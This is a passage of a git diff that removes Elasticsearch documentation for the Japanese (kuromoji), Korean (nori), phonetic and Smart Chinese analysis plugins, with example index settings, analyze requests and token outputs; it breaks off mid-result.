{ref}/analysis-cjk-width-tokenfilter.html[`cjk_width`] token filter -* <> token filter -* <> token filter -* {ref}/analysis-lowercase-tokenfilter.html[`lowercase`] token filter - -It supports the `mode` and `user_dictionary` settings from -<>. - -[discrete] -[[kuromoji-analyzer-normalize-full-width-characters]] -==== Normalize full-width characters - -The `kuromoji_tokenizer` tokenizer uses characters from the MeCab-IPADIC -dictionary to split text into tokens. The dictionary includes some full-width -characters, such as `o` and `f`. If a text contains full-width characters, -the tokenizer can produce unexpected tokens. - -For example, the `kuromoji_tokenizer` tokenizer converts the text -`Culture of Japan` to the tokens `[ culture, o, f, japan ]` -instead of `[ culture, of, japan ]`. - -To avoid this, add the <> to a custom analyzer based on the `kuromoji` analyzer. The -`icu_normalizer` character filter converts full-width characters to their normal -equivalents. - -First, duplicate the `kuromoji` analyzer to create the basis for a custom -analyzer. Then add the `icu_normalizer` character filter to the custom analyzer. -For example: - -[source,console] ----- -PUT index-00001 -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "kuromoji_normalize": { <1> - "char_filter": [ - "icu_normalizer" <2> - ], - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "kuromoji_baseform", - "kuromoji_part_of_speech", - "cjk_width", - "ja_stop", - "kuromoji_stemmer", - "lowercase" - ] - } - } - } - } - } -} ----- -<1> Creates a new custom analyzer, `kuromoji_normalize`, based on the `kuromoji` -analyzer. -<2> Adds the `icu_normalizer` character filter to the analyzer. - - -[[analysis-kuromoji-charfilter]] -==== `kuromoji_iteration_mark` character filter - -The `kuromoji_iteration_mark` normalizes Japanese horizontal iteration marks -(_odoriji_) to their expanded form. It accepts the following settings: - -`normalize_kanji`:: - - Indicates whether kanji iteration marks should be normalize. Defaults to `true`. - -`normalize_kana`:: - - Indicates whether kana iteration marks should be normalized. Defaults to `true` - - -[[analysis-kuromoji-tokenizer]] -==== `kuromoji_tokenizer` - -The `kuromoji_tokenizer` accepts the following settings: - -`mode`:: -+ --- - -The tokenization mode determines how the tokenizer handles compound and -unknown words. It can be set to: - -`normal`:: - - Normal segmentation, no decomposition for compounds. Example output: - - 関西国際空港 - アブラカダブラ - -`search`:: - - Segmentation geared towards search. This includes a decompounding process - for long nouns, also including the full compound token as a synonym. - Example output: - - 関西, 関西国際空港, 国際, 空港 - アブラカダブラ - -`extended`:: - - Extended mode outputs unigrams for unknown words. Example output: - - 関西, 関西国際空港, 国際, 空港 - ア, ブ, ラ, カ, ダ, ブ, ラ --- - -`discard_punctuation`:: - - Whether punctuation should be discarded from the output. Defaults to `true`. - -`user_dictionary`:: -+ --- -The Kuromoji tokenizer uses the MeCab-IPADIC dictionary by default. A `user_dictionary` -may be appended to the default dictionary. The dictionary should have the following CSV format: - -[source,csv] ------------------------ -, ... , ... , ------------------------ --- - -As a demonstration of how the user dictionary can be used, save the following -dictionary to `$ES_HOME/config/userdict_ja.txt`: - -[source,csv] ------------------------ -東京スカイツリー,東京 スカイツリー,トウキョウ スカイツリー,カスタム名詞 ------------------------ - --- - -You can also inline the rules directly in the tokenizer definition using -the `user_dictionary_rules` option: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "kuromoji_user_dict": { - "type": "kuromoji_tokenizer", - "mode": "extended", - "user_dictionary_rules": ["東京スカイツリー,東京 スカイツリー,トウキョウ スカイツリー,カスタム名詞"] - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "kuromoji_user_dict" - } - } - } - } - } -} --------------------------------------------------- --- - -`nbest_cost`/`nbest_examples`:: -+ --- -Additional expert user parameters `nbest_cost` and `nbest_examples` can be used -to include additional tokens that most likely according to the statistical model. -If both parameters are used, the largest number of both is applied. - -`nbest_cost`:: - - The `nbest_cost` parameter specifies an additional Viterbi cost. - The KuromojiTokenizer will include all tokens in Viterbi paths that are - within the nbest_cost value of the best path. - -`nbest_examples`:: - - The `nbest_examples` can be used to find a `nbest_cost` value based on examples. - For example, a value of /箱根山-箱根/成田空港-成田/ indicates that in the texts, - 箱根山 (Mt. Hakone) and 成田空港 (Narita Airport) we'd like a cost that gives is us - 箱根 (Hakone) and 成田 (Narita). --- - - -Then create an analyzer as follows: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "kuromoji_user_dict": { - "type": "kuromoji_tokenizer", - "mode": "extended", - "discard_punctuation": "false", - "user_dictionary": "userdict_ja.txt" - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "kuromoji_user_dict" - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "東京スカイツリー" -} --------------------------------------------------- - -The above `analyze` request returns the following: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "東京", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }, { - "token" : "スカイツリー", - "start_offset" : 2, - "end_offset" : 8, - "type" : "word", - "position" : 1 - } ] -} --------------------------------------------------- - -`discard_compound_token`:: - Whether original compound tokens should be discarded from the output with `search` mode. Defaults to `false`. - Example output with `search` or `extended` mode and this option `true`: - - 関西, 国際, 空港 - -NOTE: If a text contains full-width characters, the `kuromoji_tokenizer` -tokenizer can produce unexpected tokens. To avoid this, add the -<> to -your analyzer. See <>. - - -[[analysis-kuromoji-baseform]] -==== `kuromoji_baseform` token filter - -The `kuromoji_baseform` token filter replaces terms with their -BaseFormAttribute. This acts as a lemmatizer for verbs and adjectives. Example: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "kuromoji_baseform" - ] - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "飲み" -} --------------------------------------------------- - -which responds with: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "飲む", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - } ] -} --------------------------------------------------- - - -[[analysis-kuromoji-speech]] -==== `kuromoji_part_of_speech` token filter - -The `kuromoji_part_of_speech` token filter removes tokens that match a set of -part-of-speech tags. It accepts the following setting: - -`stoptags`:: - - An array of part-of-speech tags that should be removed. It defaults to the - `stoptags.txt` file embedded in the `lucene-analyzer-kuromoji.jar`. - -For example: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "my_posfilter" - ] - } - }, - "filter": { - "my_posfilter": { - "type": "kuromoji_part_of_speech", - "stoptags": [ - "助詞-格助詞-一般", - "助詞-終助詞" - ] - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "寿司がおいしいね" -} --------------------------------------------------- - -Which responds with: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "寿司", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }, { - "token" : "おいしい", - "start_offset" : 3, - "end_offset" : 7, - "type" : "word", - "position" : 2 - } ] -} --------------------------------------------------- - - -[[analysis-kuromoji-readingform]] -==== `kuromoji_readingform` token filter - -The `kuromoji_readingform` token filter replaces the token with its reading -form in either katakana or romaji. It accepts the following setting: - -`use_romaji`:: - - Whether romaji reading form should be output instead of katakana. Defaults to `false`. - -When using the pre-defined `kuromoji_readingform` filter, `use_romaji` is set -to `true`. The default when defining a custom `kuromoji_readingform`, however, -is `false`. The only reason to use the custom form is if you need the -katakana reading form: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "romaji_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ "romaji_readingform" ] - }, - "katakana_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ "katakana_readingform" ] - } - }, - "filter": { - "romaji_readingform": { - "type": "kuromoji_readingform", - "use_romaji": true - }, - "katakana_readingform": { - "type": "kuromoji_readingform", - "use_romaji": false - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "katakana_analyzer", - "text": "寿司" <1> -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "romaji_analyzer", - "text": "寿司" <2> -} --------------------------------------------------- - -<1> Returns `スシ`. -<2> Returns `sushi`. - -[[analysis-kuromoji-stemmer]] -==== `kuromoji_stemmer` token filter - -The `kuromoji_stemmer` token filter normalizes common katakana spelling -variations ending in a long sound character by removing this character -(U+30FC). Only full-width katakana characters are supported. - -This token filter accepts the following setting: - -`minimum_length`:: - - Katakana words shorter than the `minimum length` are not stemmed (default - is `4`). - - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "my_katakana_stemmer" - ] - } - }, - "filter": { - "my_katakana_stemmer": { - "type": "kuromoji_stemmer", - "minimum_length": 4 - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "コピー" <1> -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "サーバー" <2> -} --------------------------------------------------- - -<1> Returns `コピー`. -<2> Return `サーバ`. - - -[[analysis-kuromoji-stop]] -==== `ja_stop` token filter - -The `ja_stop` token filter filters out Japanese stopwords (`_japanese_`), and -any other custom stopwords specified by the user. This filter only supports -the predefined `_japanese_` stopwords list. If you want to use a different -predefined list, then use the -{ref}/analysis-stop-tokenfilter.html[`stop` token filter] instead. - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "analyzer_with_ja_stop": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "ja_stop" - ] - } - }, - "filter": { - "ja_stop": { - "type": "ja_stop", - "stopwords": [ - "_japanese_", - "ストップ" - ] - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "analyzer_with_ja_stop", - "text": "ストップは消える" -} --------------------------------------------------- - -The above request returns: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "消える", - "start_offset" : 5, - "end_offset" : 8, - "type" : "word", - "position" : 2 - } ] -} --------------------------------------------------- - - -[[analysis-kuromoji-number]] -==== `kuromoji_number` token filter - -The `kuromoji_number` token filter normalizes Japanese numbers (kansūji) -to regular Arabic decimal numbers in half-width characters. For example: - -[source,console] --------------------------------------------------- -PUT kuromoji_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "kuromoji_tokenizer", - "filter": [ - "kuromoji_number" - ] - } - } - } - } - } -} - -GET kuromoji_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "一〇〇〇" -} --------------------------------------------------- - -Which results in: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "1000", - "start_offset" : 0, - "end_offset" : 4, - "type" : "word", - "position" : 0 - } ] -} --------------------------------------------------- diff --git a/docs/plugins/analysis-nori.asciidoc b/docs/plugins/analysis-nori.asciidoc deleted file mode 100644 index 6a2e7c767ba..00000000000 --- a/docs/plugins/analysis-nori.asciidoc +++ /dev/null @@ -1,545 +0,0 @@ -[[analysis-nori]] -=== Korean (nori) Analysis Plugin - -The Korean (nori) Analysis plugin integrates Lucene nori analysis -module into elasticsearch. It uses the https://bitbucket.org/eunjeon/mecab-ko-dic[mecab-ko-dic dictionary] -to perform morphological analysis of Korean texts. - -:plugin_name: analysis-nori -include::install_remove.asciidoc[] - -[[analysis-nori-analyzer]] -==== `nori` analyzer - -The `nori` analyzer consists of the following tokenizer and token filters: - -* <> -* <> token filter -* <> token filter -* {ref}/analysis-lowercase-tokenfilter.html[`lowercase`] token filter - -It supports the `decompound_mode` and `user_dictionary` settings from -<> and the `stoptags` setting from -<>. - -[[analysis-nori-tokenizer]] -==== `nori_tokenizer` - -The `nori_tokenizer` accepts the following settings: - -`decompound_mode`:: -+ --- - -The decompound mode determines how the tokenizer handles compound tokens. -It can be set to: - -`none`:: - - No decomposition for compounds. Example output: - - 가거도항 - 가곡역 - -`discard`:: - - Decomposes compounds and discards the original form (*default*). Example output: - - 가곡역 => 가곡, 역 - -`mixed`:: - - Decomposes compounds and keeps the original form. Example output: - - 가곡역 => 가곡역, 가곡, 역 --- - -`discard_punctuation`:: - - Whether punctuation should be discarded from the output. Defaults to `true`. - -`user_dictionary`:: -+ --- -The Nori tokenizer uses the https://bitbucket.org/eunjeon/mecab-ko-dic[mecab-ko-dic dictionary] by default. -A `user_dictionary` with custom nouns (`NNG`) may be appended to the default dictionary. -The dictionary should have the following format: - -[source,txt] ------------------------ - [ ... ] ------------------------ - -The first token is mandatory and represents the custom noun that should be added in -the dictionary. For compound nouns the custom segmentation can be provided -after the first token (`[ ... ]`). The segmentation of the -custom compound nouns is controlled by the `decompound_mode` setting. - - -As a demonstration of how the user dictionary can be used, save the following -dictionary to `$ES_HOME/config/userdict_ko.txt`: - -[source,txt] ------------------------ -c++ <1> -C샤프 -세종 -세종시 세종 시 <2> ------------------------ - -<1> A simple noun -<2> A compound noun (`세종시`) followed by its decomposition: `세종` and `시`. - -Then create an analyzer as follows: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "nori_user_dict": { - "type": "nori_tokenizer", - "decompound_mode": "mixed", - "discard_punctuation": "false", - "user_dictionary": "userdict_ko.txt" - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "nori_user_dict" - } - } - } - } - } -} - -GET nori_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "세종시" <1> -} --------------------------------------------------- - -<1> Sejong city - -The above `analyze` request returns the following: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "세종시", - "start_offset" : 0, - "end_offset" : 3, - "type" : "word", - "position" : 0, - "positionLength" : 2 <1> - }, { - "token" : "세종", - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }, { - "token" : "시", - "start_offset" : 2, - "end_offset" : 3, - "type" : "word", - "position" : 1 - }] -} --------------------------------------------------- - -<1> This is a compound token that spans two positions (`mixed` mode). --- - -`user_dictionary_rules`:: -+ --- - -You can also inline the rules directly in the tokenizer definition using -the `user_dictionary_rules` option: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "tokenizer": { - "nori_user_dict": { - "type": "nori_tokenizer", - "decompound_mode": "mixed", - "user_dictionary_rules": ["c++", "C샤프", "세종", "세종시 세종 시"] - } - }, - "analyzer": { - "my_analyzer": { - "type": "custom", - "tokenizer": "nori_user_dict" - } - } - } - } - } -} --------------------------------------------------- --- - -The `nori_tokenizer` sets a number of additional attributes per token that are used by token filters -to modify the stream. -You can view all these additional attributes with the following request: - -[source,console] --------------------------------------------------- -GET _analyze -{ - "tokenizer": "nori_tokenizer", - "text": "뿌리가 깊은 나무는", <1> - "attributes" : ["posType", "leftPOS", "rightPOS", "morphemes", "reading"], - "explain": true -} --------------------------------------------------- - -<1> A tree with deep roots - -Which responds with: - -[source,console-result] --------------------------------------------------- -{ - "detail": { - "custom_analyzer": true, - "charfilters": [], - "tokenizer": { - "name": "nori_tokenizer", - "tokens": [ - { - "token": "뿌리", - "start_offset": 0, - "end_offset": 2, - "type": "word", - "position": 0, - "leftPOS": "NNG(General Noun)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "NNG(General Noun)" - }, - { - "token": "가", - "start_offset": 2, - "end_offset": 3, - "type": "word", - "position": 1, - "leftPOS": "J(Ending Particle)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "J(Ending Particle)" - }, - { - "token": "깊", - "start_offset": 4, - "end_offset": 5, - "type": "word", - "position": 2, - "leftPOS": "VA(Adjective)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "VA(Adjective)" - }, - { - "token": "은", - "start_offset": 5, - "end_offset": 6, - "type": "word", - "position": 3, - "leftPOS": "E(Verbal endings)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "E(Verbal endings)" - }, - { - "token": "나무", - "start_offset": 7, - "end_offset": 9, - "type": "word", - "position": 4, - "leftPOS": "NNG(General Noun)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "NNG(General Noun)" - }, - { - "token": "는", - "start_offset": 9, - "end_offset": 10, - "type": "word", - "position": 5, - "leftPOS": "J(Ending Particle)", - "morphemes": null, - "posType": "MORPHEME", - "reading": null, - "rightPOS": "J(Ending Particle)" - } - ] - }, - "tokenfilters": [] - } -} --------------------------------------------------- - - -[[analysis-nori-speech]] -==== `nori_part_of_speech` token filter - -The `nori_part_of_speech` token filter removes tokens that match a set of -part-of-speech tags. The list of supported tags and their meanings can be found here: -{lucene-core-javadoc}/../analyzers-nori/org/apache/lucene/analysis/ko/POS.Tag.html[Part of speech tags] - -It accepts the following setting: - -`stoptags`:: - - An array of part-of-speech tags that should be removed. - -and defaults to: - -[source,js] --------------------------------------------------- -"stoptags": [ - "E", - "IC", - "J", - "MAG", "MAJ", "MM", - "SP", "SSC", "SSO", "SC", "SE", - "XPN", "XSA", "XSN", "XSV", - "UNA", "NA", "VSV" -] --------------------------------------------------- -// NOTCONSOLE - -For example: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "nori_tokenizer", - "filter": [ - "my_posfilter" - ] - } - }, - "filter": { - "my_posfilter": { - "type": "nori_part_of_speech", - "stoptags": [ - "NR" <1> - ] - } - } - } - } - } -} - -GET nori_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "여섯 용이" <2> -} --------------------------------------------------- - -<1> Korean numerals should be removed (`NR`) -<2> Six dragons - -Which responds with: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "용", - "start_offset" : 3, - "end_offset" : 4, - "type" : "word", - "position" : 1 - }, { - "token" : "이", - "start_offset" : 4, - "end_offset" : 5, - "type" : "word", - "position" : 2 - } ] -} --------------------------------------------------- - - -[[analysis-nori-readingform]] -==== `nori_readingform` token filter - -The `nori_readingform` token filter rewrites tokens written in Hanja to their Hangul form. - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "nori_tokenizer", - "filter": [ "nori_readingform" ] - } - } - } - } - } -} - -GET nori_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "鄕歌" <1> -} --------------------------------------------------- - -<1> A token written in Hanja: Hyangga - -Which responds with: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [ { - "token" : "향가", <1> - "start_offset" : 0, - "end_offset" : 2, - "type" : "word", - "position" : 0 - }] -} --------------------------------------------------- - -<1> The Hanja form is replaced by the Hangul translation. - - -[[analysis-nori-number]] -==== `nori_number` token filter - -The `nori_number` token filter normalizes Korean numbers -to regular Arabic decimal numbers in half-width characters. - -Korean numbers are often written using a combination of Hangul and Arabic numbers with various kinds punctuation. -For example, 3.2천 means 3200. -This filter does this kind of normalization and allows a search for 3200 to match 3.2천 in text, -but can also be used to make range facets based on the normalized numbers and so on. - -[NOTE] -==== -Notice that this analyzer uses a token composition scheme and relies on punctuation tokens -being found in the token stream. -Please make sure your `nori_tokenizer` has `discard_punctuation` set to false. -In case punctuation characters, such as U+FF0E(.), is removed from the token stream, -this filter would find input tokens 3 and 2천 and give outputs 3 and 2000 instead of 3200, -which is likely not the intended result. - -If you want to remove punctuation characters from your index that are not part of normalized numbers, -add a `stop` token filter with the punctuation you wish to remove after `nori_number` in your analyzer chain. -==== -Below are some examples of normalizations this filter supports. -The input is untokenized text and the result is the single term attribute emitted for the input. - -- 영영칠 -> 7 -- 일영영영 -> 1000 -- 삼천2백2십삼 -> 3223 -- 조육백만오천일 -> 1000006005001 -- 3.2천 -> 3200 -- 1.2만345.67 -> 12345.67 -- 4,647.100 -> 4647.1 -- 15,7 -> 157 (be aware of this weakness) - -For example: - -[source,console] --------------------------------------------------- -PUT nori_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "tokenizer_discard_puncuation_false", - "filter": [ - "part_of_speech_stop_sp", "nori_number" - ] - } - }, - "tokenizer": { - "tokenizer_discard_puncuation_false": { - "type": "nori_tokenizer", - "discard_punctuation": "false" - } - }, - "filter": { - "part_of_speech_stop_sp": { - "type": "nori_part_of_speech", - "stoptags": ["SP"] - } - } - } - } - } -} - -GET nori_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "십만이천오백과 3.2천" -} --------------------------------------------------- - -Which results in: - -[source,console-result] --------------------------------------------------- -{ - "tokens" : [{ - "token" : "102500", - "start_offset" : 0, - "end_offset" : 6, - "type" : "word", - "position" : 0 - }, { - "token" : "과", - "start_offset" : 6, - "end_offset" : 7, - "type" : "word", - "position" : 1 - }, { - "token" : "3200", - "start_offset" : 8, - "end_offset" : 12, - "type" : "word", - "position" : 2 - }] -} --------------------------------------------------- diff --git a/docs/plugins/analysis-phonetic.asciidoc b/docs/plugins/analysis-phonetic.asciidoc deleted file mode 100644 index 1f43862bac8..00000000000 --- a/docs/plugins/analysis-phonetic.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[[analysis-phonetic]] -=== Phonetic Analysis Plugin - -The Phonetic Analysis plugin provides token filters which convert tokens to -their phonetic representation using Soundex, Metaphone, and a variety of other -algorithms. - -:plugin_name: analysis-phonetic -include::install_remove.asciidoc[] - - -[[analysis-phonetic-token-filter]] -==== `phonetic` token filter - -The `phonetic` token filter takes the following settings: - -`encoder`:: - - Which phonetic encoder to use. Accepts `metaphone` (default), - `double_metaphone`, `soundex`, `refined_soundex`, `caverphone1`, - `caverphone2`, `cologne`, `nysiis`, `koelnerphonetik`, `haasephonetik`, - `beider_morse`, `daitch_mokotoff`. - -`replace`:: - - Whether or not the original token should be replaced by the phonetic - token. Accepts `true` (default) and `false`. Not supported by - `beider_morse` encoding. - -[source,console] --------------------------------------------------- -PUT phonetic_sample -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "my_analyzer": { - "tokenizer": "standard", - "filter": [ - "lowercase", - "my_metaphone" - ] - } - }, - "filter": { - "my_metaphone": { - "type": "phonetic", - "encoder": "metaphone", - "replace": false - } - } - } - } - } -} - -GET phonetic_sample/_analyze -{ - "analyzer": "my_analyzer", - "text": "Joe Bloggs" <1> -} --------------------------------------------------- - -<1> Returns: `J`, `joe`, `BLKS`, `bloggs` - -It is important to note that `"replace": false` can lead to unexpected behavior since -the original and the phonetically analyzed version are both kept at the same token position. -Some queries handle these stacked tokens in special ways. For example, the fuzzy `match` -query does not apply {ref}/common-options.html#fuzziness[fuzziness] to stacked synonym tokens. -This can lead to issues that are difficult to diagnose and reason about. For this reason, it -is often beneficial to use separate fields for analysis with and without phonetic filtering. -That way searches can be run against both fields with differing boosts and trade-offs (e.g. -only run a fuzzy `match` query on the original text field, but not on the phonetic version). - -[discrete] -===== Double metaphone settings - -If the `double_metaphone` encoder is used, then this additional setting is -supported: - -`max_code_len`:: - - The maximum length of the emitted metaphone token. Defaults to `4`. - -[discrete] -===== Beider Morse settings - -If the `beider_morse` encoder is used, then these additional settings are -supported: - -`rule_type`:: - - Whether matching should be `exact` or `approx` (default). - -`name_type`:: - - Whether names are `ashkenazi`, `sephardic`, or `generic` (default). - -`languageset`:: - - An array of languages to check. If not specified, then the language will - be guessed. Accepts: `any`, `common`, `cyrillic`, `english`, `french`, - `german`, `hebrew`, `hungarian`, `polish`, `romanian`, `russian`, - `spanish`. diff --git a/docs/plugins/analysis-smartcn.asciidoc b/docs/plugins/analysis-smartcn.asciidoc deleted file mode 100644 index 704c15b56e6..00000000000 --- a/docs/plugins/analysis-smartcn.asciidoc +++ /dev/null @@ -1,428 +0,0 @@ -[[analysis-smartcn]] -=== Smart Chinese Analysis Plugin - -The Smart Chinese Analysis plugin integrates Lucene's Smart Chinese analysis -module into elasticsearch. - -It provides an analyzer for Chinese or mixed Chinese-English text. This -analyzer uses probabilistic knowledge to find the optimal word segmentation -for Simplified Chinese text. The text is first broken into sentences, then -each sentence is segmented into words. - -:plugin_name: analysis-smartcn -include::install_remove.asciidoc[] - - -[[analysis-smartcn-tokenizer]] -[discrete] -==== `smartcn` tokenizer and token filter - -The plugin provides the `smartcn` analyzer, `smartcn_tokenizer` tokenizer, and -`smartcn_stop` token filter which are not configurable. - -NOTE: The `smartcn_word` token filter and `smartcn_sentence` have been deprecated. - -==== Reimplementing and extending the analyzers - -The `smartcn` analyzer could be reimplemented as a `custom` analyzer that can -then be extended and configured as follows: - -[source,console] ----------------------------------------------------- -PUT smartcn_example -{ - "settings": { - "analysis": { - "analyzer": { - "rebuilt_smartcn": { - "tokenizer": "smartcn_tokenizer", - "filter": [ - "porter_stem", - "smartcn_stop" - ] - } - } - } - } -} ----------------------------------------------------- -// TEST[s/\n$/\nstartyaml\n - compare_analyzers: {index: smartcn_example, first: smartcn, second: rebuilt_smartcn}\nendyaml\n/] - -[[analysis-smartcn_stop]] -==== `smartcn_stop` token filter - -The `smartcn_stop` token filter filters out stopwords defined by `smartcn` -analyzer (`_smartcn_`), and any other custom stopwords specified by the user. -This filter only supports the predefined `_smartcn_` stopwords list. -If you want to use a different predefined list, then use the -{ref}/analysis-stop-tokenfilter.html[`stop` token filter] instead. - -[source,console] --------------------------------------------------- -PUT smartcn_example -{ - "settings": { - "index": { - "analysis": { - "analyzer": { - "smartcn_with_stop": { - "tokenizer": "smartcn_tokenizer", - "filter": [ - "porter_stem", - "my_smartcn_stop" - ] - } - }, - "filter": { - "my_smartcn_stop": { - "type": "smartcn_stop", - "stopwords": [ - "_smartcn_", - "stack", - "的" - ] - } - } - } - } - } -} - -GET smartcn_example/_analyze -{ - "analyzer": "smartcn_with_stop", - "text": "哈喽,我们是 Elastic 我们是 Elastic Stack(Elasticsearch、Kibana、Beats 和 Logstash)的开发公司。从股票行情到 Twitter 消息流,从 Apache 日志到 WordPress 博文,我们可以帮助人们体验搜索的强大力量,帮助他们以截然不同的方式探索和分析数据" -} --------------------------------------------------- - -The above request returns: - -[source,console-result] --------------------------------------------------- -{ - "tokens": [ - { - "token": "哈", - "start_offset": 0, - "end_offset": 1, - "type": "word", - "position": 0 - }, - { - "token": "喽", - "start_offset": 1, - "end_offset": 2, - "type": "word", - "position": 1 - }, - { - "token": "我们", - "start_offset": 3, - "end_offset": 5, - "type": "word", - "position": 3 - }, - { - "token": "是", - "start_offset": 5, - "end_offset": 6, - "type": "word", - "position": 4 - }, - { - "token": "elast", - "start_offset": 7, - "end_offset": 14, - "type": "word", - "position": 5 - }, - { - "token": "我们", - "start_offset": 17, - "end_offset": 19, - "type": "word", - "position": 6 - }, - { - "token": "是", - "start_offset": 19, - "end_offset": 20, - "type": "word", - "position": 7 - }, - { - "token": "elast", - "start_offset": 21, - "end_offset": 28, - "type": "word", - "position": 8 - }, - { - "token": "elasticsearch", - "start_offset": 35, - "end_offset": 48, - "type": "word", - "position": 11 - }, - { - "token": "kibana", - "start_offset": 49, - "end_offset": 55, - "type": "word", - "position": 13 - }, - { - "token": "beat", - "start_offset": 56, - "end_offset": 61, - "type": "word", - "position": 15 - }, - { - "token": "和", - "start_offset": 62, - "end_offset": 63, - "type": "word", - "position": 16 - }, - { - "token": "logstash", - "start_offset": 64, - "end_offset": 72, - "type": "word", - "position": 17 - }, - { - "token": "开发", - "start_offset": 74, - "end_offset": 76, - "type": "word", - "position": 20 - }, - { - "token": "公司", - "start_offset": 76, - "end_offset": 78, - "type": "word", - "position": 21 - }, - { - "token": "从", - "start_offset": 79, - "end_offset": 80, - "type": "word", - "position": 23 - }, - { - "token": "股票", - "start_offset": 80, - "end_offset": 82, - "type": "word", - "position": 24 - }, - { - "token": "行情", - "start_offset": 82, - "end_offset": 84, - "type": "word", - "position": 25 - }, - { - "token": "到", - "start_offset": 84, - "end_offset": 85, - "type": "word", - "position": 26 - }, - { - "token": "twitter", - "start_offset": 86, - "end_offset": 93, - "type": "word", - "position": 27 - }, - { - "token": "消息", - "start_offset": 94, - "end_offset": 96, - "type": "word", - "position": 28 - }, - { - "token": "流", - "start_offset": 96, - "end_offset": 97, - "type": "word", - "position": 29 - }, - { - "token": "从", - "start_offset": 98, - "end_offset": 99, - "type": "word", - "position": 31 - }, - { - "token": "apach", - "start_offset": 100, - "end_offset": 106, - "type": "word", - "position": 32 - }, - { - "token": "日志", - "start_offset": 107, - "end_offset": 109, - "type": "word", - "position": 33 - }, - { - "token": "到", - "start_offset": 109, - "end_offset": 110, - "type": "word", - "position": 34 - }, - { - "token": "wordpress", - "start_offset": 111, - "end_offset": 120, - "type": "word", - "position": 35 - }, - { - "token": "博", - "start_offset": 121, - "end_offset": 122, - "type": "word", - "position": 36 - }, - { - "token": "文", - "start_offset": 122, - "end_offset": 123, - "type": "word", - "position": 37 - }, - { - "token": "我们", - "start_offset": 124, - "end_offset": 126, - "type": "word", - "position": 39 - }, - { - "token": "可以", - "start_offset": 126, - "end_offset": 128, - "type": "word", - "position": 40 - }, - { - "token": "帮助", - "start_offset": 128, - "end_offset": 130, - "type": "word", - "position": 41 - }, - { - "token": "人们", - "start_offset": 130, - "end_offset": 132, - "type": "word", - "position": 42 - }, - { - "token": "体验", - "start_offset": 132, - "end_offset": 134, - "type": "word", - "position": 43 - }, - { - "token": "搜索", - "start_offset": 134, - "end_offset": 136, - "type": "word", - "position": 44 - }, - { - "token": 